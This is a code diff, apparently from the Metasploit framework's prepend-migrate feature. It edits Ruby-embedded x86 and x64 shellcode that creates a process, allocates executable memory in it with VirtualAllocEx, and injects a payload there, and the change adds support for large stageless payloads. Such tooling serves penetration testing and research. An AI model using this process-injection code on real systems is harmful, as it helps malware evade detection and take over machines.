@@ -240,8 +240,19 @@ def prepend_migrate(buf)
240240 ; allocate memory in the process (VirtualAllocEx())
241241 ; get handle
242242 push 0x40 ; RWX
243- add bh,0x10 ; ebx = 0x1000
243+ add bh, 0x10 ; ebx = 0x1000
244244 push ebx ; MEM_COMMIT
245+ EOS
246+
247+ if buf . length > 4096
248+ # probably stageless, so we don't have shellcode size constraints,
249+ # and so we can just set ebx to the size of the payload
250+ migrate_asm << <<-EOS
251+ mov ebx, #{ payloadsize }
252+ EOS
253+ end
254+
255+ migrate_asm << <<-EOS
245256 push ebx ; size
246257 xor ebx,ebx
247258 push ebx ; address
@@ -445,10 +456,11 @@ def prepend_migrate_64(buf)
445456 call rbp ; GetStartupInfoA( &si );
446457
447458 jmp getcommand
448- gotcommand:
459+ gotcommand:
449460 pop rsi ; rsi = address of process name (command line)
450461
451462 ; create the process
463+ push 0 ; keep the stack aligned
452464 lea rdi,[rsp+0x110] ; Offset of empty space for lpProcessInformation
453465 push rdi ; lpProcessInformation : write processinfo here
454466 lea rcx,[rsp+0x58]
@@ -474,7 +486,22 @@ def prepend_migrate_64(buf)
474486 ; get handle
475487 push 0x40 ; RWX
476488 mov r9,0x1000 ; 0x1000 = MEM_COMMIT
489+ EOS
490+
491+ if buf . length > 4096
492+ # probably stageless, so we don't have shellcode size constraints,
493+ # and so we can just set r8 to the size of the payload
494+ migrate_asm << <<-EOS
495+ mov r8, #{ payloadsize }
496+ EOS
497+ else
498+ # otherwise we'll juse reuse r9 (4096) for size
499+ migrate_asm << <<-EOS
477500 mov r8,r9 ; size
501+ EOS
502+ end
503+
504+ migrate_asm << <<-EOS
478505 xor rdx,rdx ; address
479506 mov rcx, [rdi] ; handle
480507 mov r10d, 0x3F9287AE ; hash( "kernel32.dll", "VirtualAllocEx" )
0 commit comments